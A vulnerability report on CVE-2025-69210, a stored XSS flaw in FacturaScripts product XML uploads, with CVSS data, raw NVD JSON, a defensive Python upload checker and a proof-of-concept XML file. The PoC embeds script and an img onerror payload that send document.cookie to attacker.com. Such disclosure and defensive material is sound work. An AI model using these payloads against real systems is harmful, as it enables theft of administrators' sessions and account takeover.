Security Vulnerability Report
CVE-2025-69210 CVSS 5.4 MEDIUM

CVE-2025-69210

Published: 2025-12-30 20:16:02
Last Modified: 2026-02-23 15:23:12

Description

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.7, a stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session. Version 2025.7 fixes the issue.
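The description points at two controls a defender wants on a product-file upload path: reject uploads that are not actually the declared format or that carry browser-active markup, and serve stored files so that a browser never renders them inline. The following is an added example written for this report, not code from FacturaScripts or from the advisory; `inspect_upload`, `download_headers` and the two sample documents are hypothetical names and constructed inputs, and the checks are generic rather than tied to the application's real upload handler.

```python
"""Defensive checks for an XML product-file upload (added example, not FacturaScripts code)."""
import re
import xml.etree.ElementTree as ET

# Patterns a browser would treat as active content if the stored file were ever
# rendered as HTML. They run over the raw text, so CDATA sections, comments and
# anything after the document element are covered as well as element content.
ACTIVE_CONTENT_PATTERNS = {
    "script element": re.compile(r"<\s*script\b", re.IGNORECASE),
    "event handler attribute": re.compile(r"\son[a-z]+\s*=", re.IGNORECASE),
    "javascript: URL": re.compile(r"javascript\s*:", re.IGNORECASE),
}

# Characters permitted in a download filename; everything else becomes "_".
SAFE_FILENAME = re.compile(r"[^A-Za-z0-9._-]+")


def inspect_upload(data: bytes) -> list:
    """Return findings for an upload that claims to be XML; [] means acceptable.

    Well-formedness is checked first: a file with markup after the root element
    (or a comment before the XML declaration) is not XML at all, whatever the
    declared content type says. The pattern scan then flags markup that would
    execute if the file were displayed inline.
    """
    findings = []
    text = data.decode("utf-8", errors="replace")
    try:
        ET.fromstring(data)
    except ET.ParseError as exc:
        findings.append(f"not well-formed XML: {exc}")
    for label, pattern in ACTIVE_CONTENT_PATTERNS.items():
        if pattern.search(text):
            findings.append(label)
    return findings


def download_headers(filename: str) -> dict:
    """Response headers for serving a stored product file without rendering it.

    The file is forced to download under a generic type, MIME sniffing is
    disabled, and a sandboxing CSP applies even if a client still shows it inline.
    """
    safe_name = SAFE_FILENAME.sub("_", filename).strip("._") or "file"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "Cache-Control": "no-store",
    }


# Constructed sample inputs, not taken from any real upload.
BENIGN_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<product><name>Test Product</name><price>99.99</price></product>
"""

# Same shape as the scenario in the advisory: script inside CDATA plus markup
# after the document element.
SUSPICIOUS_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<product><description><![CDATA[<script>alert(1)</script>]]></description></product>
<img src=x onerror="alert(1)">
"""


def main():
    for label, sample in (("benign", BENIGN_XML), ("suspicious", SUSPICIOUS_XML)):
        findings = inspect_upload(sample)
        verdict = "accept" if not findings else "reject: " + "; ".join(findings)
        print(f"{label}: {verdict}")
    print(download_headers("../../product notes.xml"))


if __name__ == "__main__":
    main()
```

Running it accepts the benign document and rejects the suspicious one on three counts (junk after the document element, a script element and an event-handler attribute). The headers are the second half of the fix: even a file that slipped past inspection cannot run in the administrator's origin if it is always delivered as an attachment with sniffing disabled.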

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation)

Configurations (Affected Products)

cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:* - VULNERABLE
FacturaScripts < 2025.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
XML
<!-- CVE-2025-69210 PoC - Malicious XML file with XSS payload -->
<!-- Upload this file through FacturaScripts product file upload functionality -->
<?xml version="1.0" encoding="UTF-8"?>
<product>
  <name>Test Product</name>
  <description><![CDATA[
    <script>
      // Steal session cookies
      var cookies = document.cookie;
      fetch('https://attacker.com/steal?data=' + btoa(cookies));
      // Perform actions as admin
      // Example: Create new admin user or exfiltrate sensitive data
      console.log('XSS Payload Executed');
    </script>
  ]]></description>
  <price>99.99</price>
</product>

<!-- Alternative payload using event handlers -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">

References

https://facturascripts.com/publicaciones/ya-disponible-facturascripts-2025-7 (Release Notes)
https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7 (Product, Release Notes)
https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-2267-xqcf-gw2m (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-69210",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-30T20:16:01.697",
    "lastModified": "2026-02-23T15:23:12.360",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.7, a stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session. Version 2025.7 fixes the issue."
      },
      {
        "lang": "es",
        "value": "FacturaScripts es un software de código abierto de planificación de recursos empresariales y contabilidad. Antes de la versión 2025.7, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en la funcionalidad de carga de archivos del producto. Usuarios autenticados pueden cargar archivos XML manipulados que contienen JavaScript ejecutable. Estos archivos son posteriormente renderizados por la aplicación sin suficiente saneamiento o aplicación del tipo de contenido, permitiendo la ejecución arbitraria de JavaScript cuando se accede al archivo. Debido a que los archivos del producto cargados por usuarios regulares son visibles para los usuarios administrativos, esta vulnerabilidad puede ser aprovechada para ejecutar JavaScript malicioso en la sesión del navegador de un administrador. La versión 2025.7 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 1.2,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "PASSIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "UNREPORTED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2025.7",
                "matchCriteriaId": "FEEE032D-0FA6-4BA9-806E-71BB06FB8729"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://facturascripts.com/publicaciones/ya-disponible-facturascripts-2025-7",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-2267-xqcf-gw2m",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}